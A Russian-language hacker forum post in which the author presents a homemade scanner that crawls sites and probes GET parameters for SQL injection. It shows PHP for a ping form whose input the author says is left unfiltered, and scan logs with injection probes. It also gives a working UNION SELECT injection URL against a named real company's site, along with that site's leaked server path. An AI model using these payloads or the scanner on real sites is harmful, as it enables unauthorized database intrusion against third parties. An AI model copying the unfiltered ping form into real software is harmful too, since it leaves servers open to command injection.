Сделал фичу:
Если такие линки встречаються:
http://injection.ua/news1.php?id=1
и
http://injection.ua/news1.php?id=2
То скрипт возьмет один линк ис етих первый попавшыйся для проверки гет-параметров.
Но, если будет такая:
http://injection.ua/news1.php?id=1&name=1
, то такую тоже будет проверять, так как здесь есть дополнительный параметр.
Также, сделал
неполное сканирование(чекбокс) - имееться ввиду, если первая ошыбка нашлась или по контенту определил скрипт, то дальше робота завершаеться. Просто так надо было долго ждать.
На даный момент недостаток:
1) относительные урлы и то что выше;
Добавил осуществление пинга через форму, там переменная для пинга не фильтруеться
:
Код:
<?
//оброботка ошыбок
# выводим все сообщения об ошыбках
error_reporting(E_ALL);
//лимита нет
set_time_limit(0);
//require("inc/functions.php");
//запрещаем кеширование браузером
nocache();
?>
<html>
<head>
<title>Сканер by Strilo4ka!</title>
</head>
<body>
<form name="" action="" method="get">
<a href="../cgi-bin/scaner.pl">Назад</a><br>
Целевой адрес (пример www.site.ru)<br>
<input name="url" type="text" value=""><br>
<input name="option" type="radio" value="1" checked>Ping<br>
<!-- <input name="option" type="radio" value="2" >Whois<br> -->
<input type="submit" value="Сделать это!">
<?php
//чтоб небыло ошыбки неинициализированой переменной
if (isset($_GET['option']))
{
switch ($_GET['option'])
{
case 1: echo "<br><b>Пингуем {$_GET['url']}:</b><br>";
echo ping($_GET['url']);
break;
case 2: echo "<b>whois для {$_GET['url']}:</b><br>";
//тут будеи функция которая возвращает результат с whois
break;
}
}
?>
</body>
</html>
?>
Теперь еще можно
указывать количество линков для пробежки чтоб не ждать долго. Для этого на форме чекбокс есть (обязательный). Если чесно мне скрипт не нравиться так как за оптимизацию не думал и воше можно было лучше намного. 2 дня писал.
Скажу что работает, вот
на этом сайте есть блинд, домен скрою:
Код:
Сканирование http://site/ ...
Линк: http://site/index.php?lan=ukr
Линк: http://site/feedback.php?lan=ukr
На данный момент парсим страничку: http://site/index.php?lan=ukr
На данный момент парсим страничку: http://site/feedback.php?lan=ukr
В линке есть гет-параметр(ы): http://site/index.php?lan=ukr
Поиск нефильтруемой переменной при включеных ошибках
http://site/index.php?lan=ukr'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://site/index.php?lan=ukrbla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://site/index.php?lan=ukr' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://site//feedback.php?lan=ukr
Поиск нефильтруемой переменной при включеных ошибках
http://site/feedback.php?lan=ukr'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://site/feedback.php?lan=ukrbla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://site/feedback.php?lan=ukr' --+
Есть возможность проведения SQL injection
Сканировать еще
Ко-во наденных линков: 2
Сами линки:
http://site/index.php?lan=ukr
http://site/feedback.php?lan=ukr
В условиях поиска задал был пробежка для сайта: 2 ну и адрес.
Реальный пример роботы скрипта №2:
взял скуль
http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,null,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ис темы "SQL Инъекции" которую нашел
Pr0mo.
- ввел этот адрес (сам домен бес скрипта и переменных (типо я не знаю что там есть дырявая переменная);
- поставил ограничиться каталогом;
- неполное сканирование;
- пробежка по 1 линку;
Код:
Сканирование http://www.stanadyne.com/ ...
Линк: http://www.stanadyne.com/view.php?id=1
На данный момент парсим страничку: http://www.stanadyne.com/view.php?id=1
В линке есть гет-параметр(ы): http://www.stanadyne.com/view.php?id=1
Поиск нефильтруемой переменной при включеных ошибках
http://www.stanadyne.com/view.php?id=1'
Есть возможность проведения SQL injection:
В контенте ошибка : Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/19/5003819/html/view.php on line 17
Сканировать еще
Ко-во наденных линков: 1
Сами линки:
http://www.stanadyne.com/view.php?id=1
Все оффтоп! Тема закрыта